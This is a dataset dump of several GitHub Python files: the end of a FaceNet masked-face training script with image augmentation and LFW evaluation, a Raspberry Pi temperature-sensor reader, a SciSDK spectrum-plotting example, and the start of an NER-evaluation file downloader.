bottleneck_layer_size=embed_length, weight_decay=0.0, reuse=None)\n prelogits = tf.identity(prelogits,name='prelogits')\n embeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n elif infer_method == \"inception_resnet_v2\":\n prelogits = inception_resnet_v2(tf_input, tf_keep_prob, phase_train=tf_phase_train,\n bottleneck_layer_size=embed_length, weight_decay=0.0, reuse=None)\n embeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n\n #---loss selection\n if loss_method == \"cross_entropy\":\n output = tf.layers.dense(inputs=prelogits, units=self.class_num, activation=None, name=\"output\")\n prediction = tf.nn.softmax(output,name=\"prediction\")\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf_label_batch,logits=output),\n name=\"loss\")\n elif loss_method == \"arc_loss\":\n m1 = 1.0 # logits_margin1: 1.0 # m1: sphereface should >= 1\n m2 = 0.5 # logits_margin2: 0.2 # m2: cosineface should >= 0\n m3 = 0.0 # logits_margin3: 0.3 # m3: arcface should >= 0\n s = 64.0 # logits_scale: 64.0\n\n norm_dense = NormDense(embed_length, self.class_num, output_name='prelogit')\n prelogit = norm_dense(embeddings)\n\n logit_cos = self.arcloss(embeddings, prelogit, tf_label_batch, m1, m2, m3, s)\n prediction = tf.nn.softmax(logit_cos, name='prediction')\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=tf_label_batch, logits=logit_cos), name='loss')\n\n #----optimizer selection\n if opti_method == \"adam\":\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)\n elif opti_method == 'adagrad':\n optimizer = tf.train.AdagradOptimizer(learning_rate).minimize(loss)\n\n # ----face detection init\n self.detector = dlib.get_frontal_face_detector()\n self.predictor = dlib.shape_predictor('src/models/shape_predictor_68_face_landmarks.dat')\n\n\n #----create the dir to save model weights(CKPT, PB)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n out_dir_prefix = os.path.join(save_dir,\"model\")\n saver = tf.train.Saver(max_to_keep=5)\n\n\n #----appoint PB node names\n pb_save_path = os.path.join(save_dir,\"pb_model.pb\")\n pb_save_list = ['prelogits','prediction',\"embeddings\"]\n\n\n #----create the log(JSON)\n count = 0\n for i in range(100):\n log_path = os.path.join(save_dir,\"train_result_\" + str(count) + \".json\")\n if not os.path.exists(log_path):\n break\n count += 1\n print(\"log_path: \",log_path)\n self.content = self.log_update(self.content,para_dict)\n\n #----local var to global\n self.tf_input = tf_input\n self.tf_keep_prob = tf_keep_prob\n self.tf_label_batch = tf_label_batch\n self.tf_phase_train = tf_phase_train\n self.embeddings = embeddings\n self.optimizer = optimizer\n self.prediction = prediction\n self.out_dir_prefix = out_dir_prefix\n self.saver = saver\n self.pb_save_path = pb_save_path\n self.pb_save_list = pb_save_list\n self.log_path = log_path\n self.save_dir = save_dir\n self.model_shape = model_shape\n self.loss = loss\n\n def train(self,para_dict):\n #----var parsing\n epochs = para_dict['epochs']\n GPU_ratio = para_dict['GPU_ratio']\n batch_size = para_dict['batch_size']\n ratio=para_dict['ratio']\n select_num = para_dict['select_num']\n process_dict = para_dict['process_dict']\n aug_times = para_dict['aug_times']\n test_acc_threshold = 0.965\n\n #----local var\n train_loss_list = list()\n train_acc_list = list()\n test_loss_list = list()\n test_acc_list = list()\n epoch_time_list = list()\n img_quantity = 0\n aug_enable = False\n p_dict_1 = {'rdm_mask': False, 'rdm_crop': True, 'rdm_br': True, 'rdm_blur': True, 'rdm_flip': True,\n 'rdm_noise': False, 'rdm_angle': True}\n p_dict_2 = {'rdm_mask': True, 'rdm_crop': True, 'rdm_br': True, 'rdm_blur': True, 'rdm_flip': True,\n 'rdm_noise': False, 'rdm_angle': True}\n p_dict_3 = {'rdm_mask': True, 'rdm_crop': True, 'rdm_br': True, 'rdm_blur': True, 'rdm_flip': True,\n 'rdm_noise': False, 'rdm_angle': True}\n\n self.content = self.log_update(self.content, para_dict)\n\n #----ratio\n # if ratio <= 1.0:\n # img_quantity = int(self.train_paths.shape[0] * ratio)\n # else:\n # img_quantity = self.train_paths.shape[0]\n\n\n\n #----check if the augmentation(image processing) is enabled\n if isinstance(process_dict,dict):\n if True in process_dict.values():\n aug_enable = True\n batch_size = batch_size // aug_times #the batch size must be integer!!\n\n\n #----calculate iterations of one epoch\n #train_ites = math.ceil(img_quantity / batch_size)\n # if self.test_img_dir is not None:\n # test_ites = math.ceil(self.test_paths.shape[0] / batch_size)\n\n #----GPU setting\n config = tf.ConfigProto(log_device_placement=True,\n allow_soft_placement=True)\n if GPU_ratio is None:\n config.gpu_options.allow_growth = True\n else:\n config.gpu_options.per_process_gpu_memory_fraction = GPU_ratio\n\n with tf.Session(config=config) as sess:\n #----tranfer learning check\n files = [file.path for file in os.scandir(self.save_dir) if file.name.split(\".\")[-1] == 'meta']\n if len(files) == 0:\n sess.run(tf.global_variables_initializer())\n print(\"no previous model param can be used!\")\n else:\n check_name = files[-1].split(\"\\\\\")[-1].split(\".\")[0]\n model_path = os.path.join(self.save_dir,check_name)\n self.saver.restore(sess,model_path)\n msg = \"use previous model param:{}\".format(model_path)\n print(msg)\n\n #----epoch training\n for epoch in range(epochs):\n #----record the start time\n d_t = time.time()\n\n train_loss = 0\n train_acc = 0\n test_loss = 0\n test_acc = 0\n\n #----training data process\n t_1 = time.time()\n if ratio is not None:\n if ratio <= 1.0:\n img_quantity = int(self.train_paths.shape[0] * ratio)\n else:\n img_quantity = self.train_paths.shape[0]\n # ----shuffle\n indice = np.random.permutation(self.train_paths.shape[0])\n self.train_paths = self.train_paths[indice]\n self.train_labels = self.train_labels[indice]\n train_paths_ori = self.train_paths[:img_quantity]\n train_labels_ori = self.train_labels[:img_quantity]\n elif select_num is not None:\n select_num = int(select_num)\n if select_num >= 1:\n #----reset paths and lables\n train_paths_ori = list()\n train_labels_ori = list()\n #----select images from each folder\n for paths,labels in zip(self.train_paths,self.train_labels):\n np.random.shuffle(paths)\n num = np.minimum(len(paths), select_num)\n train_paths_ori.extend(paths[:num])\n train_labels_ori.extend(labels[:num])\n #----list to np array\n train_paths_ori = np.array(train_paths_ori)\n train_labels_ori = np.array(train_labels_ori)\n #----shuffle\n indice = np.random.permutation(train_paths_ori.shape[0])\n train_paths_ori = train_paths_ori[indice]\n train_labels_ori = train_labels_ori[indice]\n\n #----calculate the image quantity\n img_quantity = train_paths_ori.shape[0]\n else:\n print(\"select number is under 1\")\n raise ValueError\n t_1 = time.time() - t_1\n print(\"\\nTime of preparing the training data: \",t_1)\n\n # ----calculate iterations of one epoch\n train_ites = math.ceil(img_quantity / batch_size)\n\n # ----info display\n print(\"img_quantity:\", img_quantity)\n if aug_enable is True:\n print(\"aug_enable is True, the data quantity of one epoch is {} times\".format(aug_times))\n\n\n # if aug_enable is True:\n # train_paths_aug = train_paths_ori[::-1]\n # train_labels_aug = train_labels_ori[::-1]\n\n #----do optimizers(training by iteration)\n for index in range(train_ites):\n #----get image start and end numbers\n num_start = index * batch_size\n num_end = np.minimum(num_start + batch_size, train_paths_ori.shape[0])\n paths = train_paths_ori[num_start:num_end]\n labels = train_labels_ori[num_start:num_end]\n\n # ----get 4-D data\n if aug_enable is True:\n for i in range(aug_times):\n if i == 0:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=None)\n batch_data = temp\n batch_labels = labels\n elif i == 1:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=p_dict_1)\n elif i == 2:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=p_dict_2)\n elif i == 3:\n temp = self.get_4D_data(paths, self.model_shape[1:], process_dict=p_dict_3)\n\n if i > 0:\n batch_data = np.concatenate([batch_data, temp], axis=0)\n batch_labels = np.concatenate([batch_labels, labels], axis=0)\n\n indice = np.random.permutation(batch_data.shape[0])\n batch_data = batch_data[indice]\n batch_labels = batch_labels[indice]\n else:\n batch_data = self.get_4D_data(train_paths_ori[num_start:num_end], self.model_shape[1:])\n batch_labels = train_labels_ori[num_start:num_end]\n #----images display(test code)\n #set batch size = 4 and not shuffle\n # print(\"batch_data shape:\", batch_data.shape)\n # for i in range(aug_times):\n # plt.subplot(1, aug_num, i + 1)\n # plt.imshow(batch_data[i])\n # plt.axis('off')\n #\n # plt.show()\n\n #----put all data to tf placeholders\n feed_dict = {self.tf_input:batch_data,\n self.tf_label_batch:batch_labels,\n self.tf_keep_prob:0.8,\n self.tf_phase_train:True}\n #----session run\n sess.run(self.optimizer,feed_dict=feed_dict)\n #----evaluation(training set)\n feed_dict[self.tf_keep_prob] = 1.0\n feed_dict[self.tf_phase_train] = False\n loss_temp, predict_temp = sess.run([self.loss, self.prediction], feed_dict=feed_dict)\n\n # ----calculate the loss and accuracy\n train_loss += loss_temp\n train_acc += self.evaluation(predict_temp, batch_labels)\n\n train_loss /= train_ites\n train_acc /= img_quantity\n if aug_enable is True:#divided by aug_times because the training data quantity is multiplied by aug_times\n train_acc /= aug_times\n\n #-----testing set(LFW) evaluation\n if self.test_img_dir is not None:\n test_acc = self.eval_on_lfw(sess, feed_dict, self.test_img_dir, batch_size=batch_size)\n\n #print(\"train_loss:{}, train_acc:{}\".format(train_loss,train_acc))\n\n #----evaluation(test set)\n # if self.test_img_dir is not None:\n # for index in range(test_ites):\n # # ----get image start and end numbers\n # num_start = index * batch_size\n # num_end = np.minimum(num_start + batch_size, self.test_paths.shape[0])\n #\n # batch_data = self.get_4D_data(self.test_paths[num_start:num_end], self.model_shape[1:])\n #\n # # ----put all data to tf placeholders\n # feed_dict = {self.tf_input: batch_data,\n # self.tf_label_batch: self.test_labels[num_start:num_end],\n # self.tf_keep_prob: 1.0}\n #\n # # ----session run\n # loss_temp, predict_temp = sess.run([self.loss, self.prediction], feed_dict=feed_dict)\n #\n # # ----calculate the loss and accuracy\n # test_loss += loss_temp\n # test_acc += self.evaluation(predict_temp, self.test_labels[num_start:num_end])\n #\n # test_loss /= test_ites\n # test_acc /= self.test_paths.shape[0]\n # #print(\"test_loss:{}, test_acc:{}\".format(test_loss, test_acc))\n\n #----save ckpt, pb files\n model_save_path = self.saver.save(sess,self.out_dir_prefix,global_step=epoch)\n print(\"save model CKPT to \",model_save_path)\n\n graph = tf.get_default_graph().as_graph_def()\n output_graph_def = tf.graph_util.convert_variables_to_constants(sess,graph,self.pb_save_list)\n with tf.gfile.GFile(self.pb_save_path,'wb')as f:\n f.write(output_graph_def.SerializeToString())\n print(\"save PB file to \",self.pb_save_path)\n\n if test_acc > test_acc_threshold:\n pb_save_path = \"pb_{}.pb\".format(np.round(float(test_acc*100),1))\n pb_save_path = os.path.join(self.save_dir,pb_save_path)\n graph = tf.get_default_graph().as_graph_def()\n output_graph_def = tf.graph_util.convert_variables_to_constants(sess, graph, self.pb_save_list)\n with tf.gfile.GFile(pb_save_path, 'wb')as f:\n f.write(output_graph_def.SerializeToString())\n\n test_acc_threshold = test_acc\n\n #----record the end time\n d_t = time.time() - d_t\n\n #----save results in the log file\n train_loss_list.append(float(train_loss))\n train_acc_list.append(float(train_acc))\n if self.test_img_dir is not None:\n #test_loss_list.append(float(test_loss))\n test_acc_list.append(float(test_acc))\n\n self.content[\"train_loss_list\"] = train_loss_list\n self.content[\"train_acc_list\"] = train_acc_list\n if self.test_img_dir is not None:\n #self.content[\"test_loss_list\"] = test_loss_list\n self.content[\"test_acc_list\"] = test_acc_list\n\n epoch_time_list.append(d_t)\n self.content['ave_epoch_time'] = float(np.average(epoch_time_list))\n\n with open(self.log_path, 'w') as f:\n json.dump(self.content,f)\n\n print(\"save the log file in \",self.log_path)\n\n\n\n #----display training results\n print(\"\\nEpoch: \",epoch)\n print(\"training loss:{}, accuracy:{}\".format(train_loss,train_acc))\n if self.test_img_dir is not None:\n print(\"test set accuracy:{}\".format( test_acc))\n\n print(\"Epoch time consumption:\",d_t)\n\n #----loss functions\n def arcloss(self, x, normx_cos, labels, m1, m2, m3, s):\n norm_x = tf.norm(x, axis=1, keepdims=True)\n print(\"norm_x shape = \", norm_x.shape)\n cos_theta = normx_cos / norm_x\n theta = tf.acos(cos_theta)\n mask = tf.one_hot(labels, depth=normx_cos.shape[-1])\n zeros = tf.zeros_like(mask)\n cond = tf.where(tf.greater(theta * m1 + m3, math.pi), zeros, mask)\n cond = tf.cast(cond, dtype=tf.bool)\n m1_theta_plus_m3 = tf.where(cond, theta * m1 + m3, theta)\n cos_m1_theta_plus_m3 = tf.cos(m1_theta_plus_m3)\n prelogits = tf.where(cond, cos_m1_theta_plus_m3 - m2, cos_m1_theta_plus_m3) * s\n\n return prelogits\n\n #----functions\n def log_update(self,content,para_dict):\n for key, value in para_dict.items():\n content[key] = value\n\n return content\n\n def evaluation(self,predictions,labels):\n count = 0\n for i in range(predictions.shape[0]):\n if np.argmax(predictions[i]) == labels[i]:\n count += 1\n\n return count\n\n def get_4D_data(self,paths, img_shape, process_dict=None):\n # ----var\n re_array = []\n processing_enable = False\n x_range = 10\n y_range = 20\n flip_list = [1, 0]\n kernel_list = [1, 3, 5, 7]\n\n # ----create default np array\n batch_dim = [len(paths)]\n batch_dim.extend(img_shape)\n batch_data = np.zeros(batch_dim, dtype=np.float32)\n\n # ----check process_dict\n if isinstance(process_dict, dict):\n if len(process_dict) > 0:\n processing_enable = True # image processing is enabled\n\n for idx, path in enumerate(paths):\n img = cv2.imread(path)\n if img is None:\n print(\"read failed:\", path)\n else:\n # ----image processing\n if processing_enable is True:\n if 'rdm_crop' in process_dict.keys():\n if process_dict['rdm_crop'] is True:\n #img = cv2.resize(img,(width_rdm_crop,height_rdm_crop))\n\n # ----Find a random point\n x_start = np.random.randint(x_range)\n y_start = np.random.randint(y_range)\n\n # ----From the random point, crop the image\n img = img[y_start:, x_start:, :]\n if 'rdm_br' in process_dict.keys():\n if process_dict['rdm_br'] is True:\n mean_br = np.mean(img)\n br_factor = np.random.randint(mean_br * 0.7, mean_br * 1.3)\n img = np.clip(img / mean_br * br_factor, 0,\n 255) # the multiplication makes the numeric type become floating\n img = img.astype(np.uint8) # transform the numeric type to unsigned integer 8(UINT8)\n if 'rdm_mask' in process_dict.keys():\n if process_dict['rdm_mask'] is True:\n x_min, x_max, y_min, y_max, size = detect_mouth(img, self.detector, self.predictor)\n if size is not None:\n # ----random selection of face mask\n item_path = np.random.choice(self.mask_files)\n\n # ----face mask process\n item_img = cv2.imread(item_path, cv2.IMREAD_UNCHANGED)\n # item_img = mask_paths[which]\n #print(item_img.shape)\n item_img = cv2.resize(item_img, size)\n item_img_rgb = item_img[:, :, :3]\n # item_img_rgb = item_img_rgb[:,:,::-1]#transform the color format to RGB\n\n item_alpha_ch = item_img[:, :, 3]\n _, item_mask = cv2.threshold(item_alpha_ch, 220, 255, cv2.THRESH_BINARY)\n img_item = cv2.bitwise_and(item_img_rgb, item_img_rgb, mask=item_mask)\n\n # ----mouth part process\n roi = img[y_min:y_min + size[1], x_min:x_min + size[0]]\n item_mask_inv = cv2.bitwise_not(item_mask)\n roi = cv2.bitwise_and(roi, roi, mask=item_mask_inv)\n\n # ----addition of mouth and face mask\n dst = cv2.add(roi, img_item)\n img[y_min: y_min + size[1], x_min:x_min + size[0]] = dst\n\n if 'rdm_blur' in process_dict.keys():\n if process_dict['rdm_blur'] is True:\n kernel = tuple(np.random.choice(kernel_list, size=2))\n #print(\"kernel:\", kernel)\n img = cv2.GaussianBlur(img, kernel, 0, 0)\n\n if 'rdm_flip' in process_dict.keys():\n if process_dict['rdm_flip'] is True:\n flip_type = np.random.choice(flip_list)\n if flip_type == 1:\n img = cv2.flip(img, flip_type)\n if 'rdm_noise' in process_dict.keys():\n if process_dict['rdm_noise'] is True:\n uniform_noise = np.empty((img.shape[0], img.shape[1]), dtype=np.uint8)\n cv2.randu(uniform_noise, 0, 255)\n ret, impulse_noise = cv2.threshold(uniform_noise, 240, 255, cv2.THRESH_BINARY_INV)\n img = cv2.bitwise_and(img, img, mask=impulse_noise)\n if 'rdm_angle' in process_dict.keys():\n if process_dict['rdm_angle'] is True:\n angle = np.random.randint(-15, 15)\n img = cv2.resize(img, (img_shape[1], img_shape[0]))\n #print(img.shape)\n h, w = img.shape[:2]\n M = cv2.getRotationMatrix2D((w // 2, h // 2), angle, 1.0)\n img = cv2.warpAffine(img, M, (h, w))\n # ----\n img = cv2.resize(img, (img_shape[1], img_shape[0]))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n batch_data[idx] = img\n\n #re_array = np.array(re_array)\n\n return batch_data / 255\n\n def get_4D_data_2(self,paths, img_shape, process_dict=None):\n # ----var\n random_flip = False\n random_brightness = False\n random_crop = False\n random_angle = False\n random_noise = False\n flip_list = [1, 0]\n\n # ----create default np array\n batch_dim = [len(paths)]\n batch_dim.extend(img_shape)\n batch_data = np.zeros(batch_dim, dtype=np.float32)\n\n # ----update var\n if isinstance(process_dict, dict):\n if 'random_flip' in process_dict.keys():\n random_flip = process_dict['random_flip']\n if 'random_brightness' in process_dict.keys():\n random_brightness = process_dict['random_brightness']\n if 'random_crop' in process_dict.keys():\n random_crop = process_dict['random_crop']\n if 'random_angle' in process_dict.keys():\n random_angle = process_dict['random_angle']\n if 'random_noise' in process_dict.keys():\n random_noise = process_dict['random_noise']\n\n for idx, path in enumerate(paths):\n img = cv2.imread(path)\n if img is None:\n print(\"read failed:\", path)\n else:\n img = cv2.resize(img, (img_shape[1], img_shape[0]))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # ----random brightness\n if random_brightness is True:\n mean_br = np.mean(img)\n br_factor = np.random.randint(mean_br * 0.7, mean_br * 1.3)\n img = np.clip(img / mean_br * br_factor, 0, 255)\n img = img.astype(np.uint8)\n\n # ----random crop\n if random_crop is True:\n # ----resize the image 1.15 times\n img = cv2.resize(img, None, fx=1.15, fy=1.15)\n\n # ----Find a random point\n y_range = img.shape[0] - img_shape[0]\n x_range = img.shape[1] - img_shape[1]\n x_start = np.random.randint(x_range)\n y_start = np.random.randint(y_range)\n\n # ----From the random point, crop the image\n img = img[y_start:y_start + img_shape[0], x_start:x_start + img_shape[1], :]\n\n # ----random flip\n if random_flip is True:\n flip_type = np.random.choice(flip_list)\n if flip_type == 1:\n img = cv2.flip(img, flip_type)\n\n # ----random angle\n if random_angle is True:\n angle = np.random.randint(-60, 60)\n height, width = img.shape[:2]\n M = cv2.getRotationMatrix2D((width // 2, height // 2), angle, 1.0)\n img = cv2.warpAffine(img, M, (width, height))\n\n # ----random noise\n if random_noise is True:\n uniform_noise = np.empty((img.shape[0], img.shape[1]), dtype=np.uint8)\n cv2.randu(uniform_noise, 0, 255)\n ret, impulse_noise = cv2.threshold(uniform_noise, 240, 255, cv2.THRESH_BINARY_INV)\n img = cv2.bitwise_and(img, img, mask=impulse_noise)\n\n batch_data[idx] = img\n\n batch_data /= 255\n return batch_data\n\n def eval_on_lfw(self, sess, feed_dict, lfw_dir, batch_size=12):\n # ----Read the file containing the pairs used for testing\n time_eval = time.time()\n lfw_pairs_path = r'pairs.txt'\n pairs = read_pairs(os.path.expanduser(lfw_pairs_path))\n\n # ----Get the paths for the corresponding images\n paths, actual_issame = get_paths(os.path.expanduser(lfw_dir), pairs)\n\n # ----collect all embeddings\n iterations = math.ceil(len(paths) / batch_size)\n\n for i in range(iterations):\n n_start = i * batch_size\n n_end = np.minimum(i * batch_size + batch_size, len(paths))\n\n batch_data = self.get_4D_data(paths[n_start:n_end], self.model_shape[1:])\n\n feed_dict[self.tf_input] = batch_data\n sess_out = sess.run(self.embeddings, feed_dict=feed_dict)\n if i == 0:\n embeddings = sess_out\n else:\n embeddings = np.concatenate([embeddings, sess_out], axis=0)\n\n tpr, fpr, accuracy, val, val_std, far = evaluate(embeddings, actual_issame, nrof_folds=10,\n distance_metric=0,\n subtract_mean=False)\n\n print('Accuracy: %2.5f+-%2.5f' % (np.mean(accuracy), np.std(accuracy)))\n print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' % (val, val_std, far))\n\n auc = metrics.auc(fpr, tpr)\n print('Area Under Curve (AUC): %1.3f' % auc)\n\n time_eval = time.time() - time_eval\n print(\"Eval on LFW time:\", time_eval)\n\n return np.mean(accuracy)\n\n def __get_label_dict(self,img_dir):\n label_dict = dict()\n count = 0\n for obj in os.scandir(img_dir):\n if obj.is_dir():\n label_dict[obj.name] = count\n count += 1\n if count == 0:\n print(\"No dir in the \",img_dir)\n return None\n else:\n return label_dict\n\n def __get_paths_labels(self,img_dir,label_dict,type='extend'):\n #----var\n img_format = {'png', 'jpg', 'bmp'}\n re_paths = list()\n re_labels = list()\n\n #----read dirs\n dirs = [obj.path for obj in os.scandir(img_dir) if obj.is_dir()]\n if len(dirs) == 0:\n print(\"No dirs in the \",img_dir)\n else:\n #-----read paths of each dir\n for dir_path in dirs:\n path_temp = [file.path for file in os.scandir(dir_path) if file.name.split(\".\")[-1] in img_format]\n if len(path_temp) == 0:\n print(\"No images in the \",dir_path)\n else:\n #----get the label number from class name\n label_num = dir_path.split(\"\\\\\")[-1]\n label_num = label_dict[label_num]\n #----create the label array\n label_temp = np.ones(len(path_temp),dtype=np.int32) * label_num\n\n #----collect paths and labels\n if type == 'append':\n re_paths.append(path_temp)\n re_labels.append(label_temp)\n elif type == 'extend':\n re_paths.extend(path_temp)\n re_labels.extend(label_temp)\n\n #----list to numpy array\n # re_paths = np.array(re_paths)\n # re_labels = np.array(re_labels)\n\n #----shuffle\n # indice = np.random.permutation(re_paths.shape[0])\n # re_paths = re_paths[indice]\n # re_labels = re_labels[indice]\n\n return re_paths, re_labels\n\n #----models\n def resnet_block(self,input_x, k_size=3,filters=32):\n net = tf.layers.conv2d(\n inputs=input_x,\n filters = filters,\n kernel_size=[k_size,k_size],\n kernel_regularizer=tf.keras.regularizers.l2(0.1),\n padding=\"same\",\n activation=tf.nn.relu\n )\n net = tf.layers.conv2d(\n inputs=net,\n filters=filters,\n kernel_size=[k_size, k_size],\n kernel_regularizer=tf.keras.regularizers.l2(0.1),\n padding=\"same\",\n activation=tf.nn.relu\n )\n\n net_1 = tf.layers.conv2d(\n inputs=input_x,\n filters=filters,\n kernel_size=[k_size, k_size],\n kernel_regularizer=tf.keras.regularizers.l2(0.1),\n padding=\"same\",\n activation=tf.nn.relu\n )\n\n add = tf.add(net,net_1)\n\n add_result = tf.nn.relu(add)\n\n return add_result\n\n def simple_resnet(self,tf_input,tf_keep_prob,class_num):\n net = self.resnet_block(tf_input,k_size=3,filters=16)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2,2], strides=2)\n print(\"pool_1 shape:\",net.shape)\n\n net = self.resnet_block(net, k_size=3, filters=32)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2, 2], strides=2)\n print(\"pool_2 shape:\", net.shape)\n\n net = self.resnet_block(net, k_size=3, filters=48)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2, 2], strides=2)\n print(\"pool_3 shape:\", net.shape)\n\n net = self.resnet_block(net, k_size=3, filters=64)\n net = tf.layers.max_pooling2d(inputs=net, pool_size=[2, 2], strides=2)\n print(\"pool_4 shape:\", net.shape)\n\n #----flatten\n net = tf.layers.flatten(net)\n print(\"flatten shape:\",net.shape)\n\n #----dropout\n net = tf.nn.dropout(net,keep_prob=tf_keep_prob)\n\n #----FC\n net = tf.layers.dense(inputs=net,units=128,activation=tf.nn.relu)\n print(\"FC shape:\",net.shape)\n\n #----output\n # output = tf.layers.dense(inputs=net,units=class_num,activation=None)\n # print(\"output shape:\",output.shape)\n\n return net\n\n\nif __name__ == \"__main__\":\n # train_img_dir = r\"D:\\CASIA\\CASIA-WebFace\"\n train_img_dir = [r\"C:\\Users\\ztyam\\3D Objects\\DataSet\\CASIA-WebFace_aligned\"\n ]\n test_img_dir = r\"C:\\Users\\ztyam\\3D Objects\\DataSet\\lfw-alignment_2\"\n label_dict = None\n embed_length = 128\n get_image_type = 'append'#append #extend\n\n para_dict = {\"train_img_dir\":train_img_dir,\"test_img_dir\":test_img_dir,\"label_dict\":label_dict,'get_image_type':get_image_type}\n\n cls = Facenet(para_dict)\n\n model_shape = [None,112,112,3]#at least[None,80,80,3] if you use inception_resnet_v1\n infer_method = \"inception_resnet_v1\" #\"inception_resnet_v2\" #inception_resnet_v1\n loss_method = \"cross_entropy\" #\"arc_loss\"#\"cross_entropy\"\n opti_method = \"adam\" #adagrad #adam\n learning_rate = 5e-4\n save_dir = r\"C:\\Users\\ztyam\\OneDrive - University of Florida\\0_UF Class\\2021 Spring\\03_Pattern Recognition\\Project\\TrainedModels\\FaceNet_masked_pic_aug2_new\"\n\n para_dict = {\"model_shape\":model_shape,\"infer_method\":infer_method,\"loss_method\":loss_method,\n \"opti_method\":opti_method,'learning_rate':learning_rate,\"save_dir\":save_dir,'embed_length':embed_length}\n cls.model_init(para_dict)\n\n epochs = 100\n GPU_ratio = None#0.1 ~ 0.9\n batch_size = 60#depends on your GPU resource. Set <= 96 if 6GB GPU using inception_resnet_v1\n ratio = None\n select_num = 4\n\n\n random_flip = True\n random_brightness = True\n random_crop = True\n random_angle = True\n random_noise = True\n aug_times = 4\n\n process_dict = {\"rdm_flip\":random_flip,'rdm_br':random_brightness,'rdm_crop':random_crop,'rdm_angle':random_angle,\n 'rdm_noise':random_noise}\n if True in process_dict.values():\n pass\n else:\n process_dict = None\n para_dict = {'epochs':epochs, \"GPU_ratio\":GPU_ratio, \"batch_size\":batch_size,\"ratio\":ratio,'process_dict':process_dict,\n 'select_num':select_num,'aug_times':aug_times}\n\n cls.train(para_dict)\n","repo_name":"LIMONIC/Masked-face-recognition","sub_path":"FaceNet-train-data-augmentation2/facenet_train.py","file_name":"facenet_train.py","file_ext":"py","file_size_in_byte":40931,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"26531030000","text":"import smbus\nimport time\ndef read_adt7410():\n word=bus.read_word_data(address_adt7410,register_adt7410)\n data=(word & 0xff00)>>8 | (word & 0xff)<<8\n data>>=3\n if data & 0x1000 == 0: # the temperature >= 0.\n temp=data*0.0625\n else:\n temp=((~data&0x1fff) + 1)*-0.0625\n return temp\nbus=smbus.SMBus(1)\naddress_adt7410=0x48\nregister_adt7410=0x00\ntry:\n while True:\n value=read_adt7410()\n print(value)\n time.sleep(0.5)\nexcept KeyboardInterrupt:\n pass\n","repo_name":"ouj-cs/ouj-cs","sub_path":"yk/raspi/p162_temperature.py","file_name":"p162_temperature.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9902248935","text":"from random import randint\nfrom unicodedata import decimal\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport os\nfrom scisdk.scisdk import SciSDK\nfrom scisdk.scisdk_defines import *\n\nfig = plt.figure(\"Spectrum Data\")\nax1 = fig.add_subplot(1,1,1)\n\nsdk = SciSDK()\n\n# add new device\n#DT1260\nres = sdk.AddNewDevice(\"usb:10500\",\"dt1260\", \"./DT1260RegisterFile.json\",\"board0\")\n#DT5560\n#res = sdk.AddNewDevice(\"192.168.50.10:8888\",\"DT5560\", \"./DT5560RegisterFile.json\",\"board0\")\n#DT5550\n#res = sdk.AddNewDevice(\"usb:11000\",\"DT5550\", \"./DT5550RegisterFile.json\",\"board0\")\n#V2740\n#res = sdk.AddNewDevice(\"192.168.50.10\",\"V2740\", \"./V2740RegisterFile.json\",\"board0\")\n\nif not res == 0:\n print(\"Program exit due connection error\")\n exit()\n\n# configure firmware register\nsdk.SetRegister(\"board0:/Registers/noisepower\", 100)\nsdk.SetRegister(\"board0:/Registers/centroid\", 1000)\n\n# set board parameters\nsdk.SetParameterString(\"board0:/MMCComponents/Spectrum_0.rebin\", \"0\")\nsdk.SetParameterString(\"board0:/MMCComponents/Spectrum_0.limitmode\", \"freerun\")\nsdk.SetParameterString(\"board0:/MMCComponents/Spectrum_0.limit\", \"100\")\n\n# execute command reset\nsdk.ExecuteCommand(\"board0:/MMCComponents/Spectrum_0.reset\", \"\")\n\n# execute command start\nsdk.ExecuteCommand(\"board0:/MMCComponents/Spectrum_0.start\", \"\")\n\n\n# allocate buffer\nres, buf = sdk.AllocateBuffer(\"board0:/MMCComponents/Spectrum_0\")\n\n\ndef updateGraph(i, buffer): # function that provides to plot new data on graph\n res, buffer = sdk.ReadData(\"board0:/MMCComponents/Spectrum_0\", buffer)# read data from board\n if res == 0:\n xar = []\n yar = []\n for index in range(buffer.info.valid_bins):\n xar.append(index)\n yar.append(buffer.data[index])\n ax1.clear()\n ax1.plot(xar,yar)\n\n# update graph every 50ms\nani = animation.FuncAnimation(fig, updateGraph, fargs=[buf,],interval=100)\n# updateGraph(None, buf, decimator)\nplt.show()\n","repo_name":"NuclearInstruments/SCISDK","sub_path":"examples/components/Python/Spectrum/PlotGraph/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"13197961697","text":"import os\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin, urlparse\n\n#============================================ set parameters here =========================================\n\n\n# links for gold-standard files and model prediction file to be downloaded from\ngold_url = 'https://github.com/clamsproject/clams-aapb-annotations/tree/main/golds/ner/2022-jun-namedentity'\ntest_url = 'https://github.com/JinnyViboonlarp/ner-evaluation/tree/main/testfiles'\n\n# local folders to save the files from gold_url and test_url respectively\ngold_folder = 'goldfiles'\ntest_folder = 'testfiles'\n\n# path to save NER evaluation result\nresultpath = 'result.txt'\n\n#============================================ set parameters end here ====================================\n\ndef download(url=None, folder_name=None):\n # code adapt from Angela Lam's\n\n # Extract the repository name from the URL, name would be the phrase after the last \"/\"\n 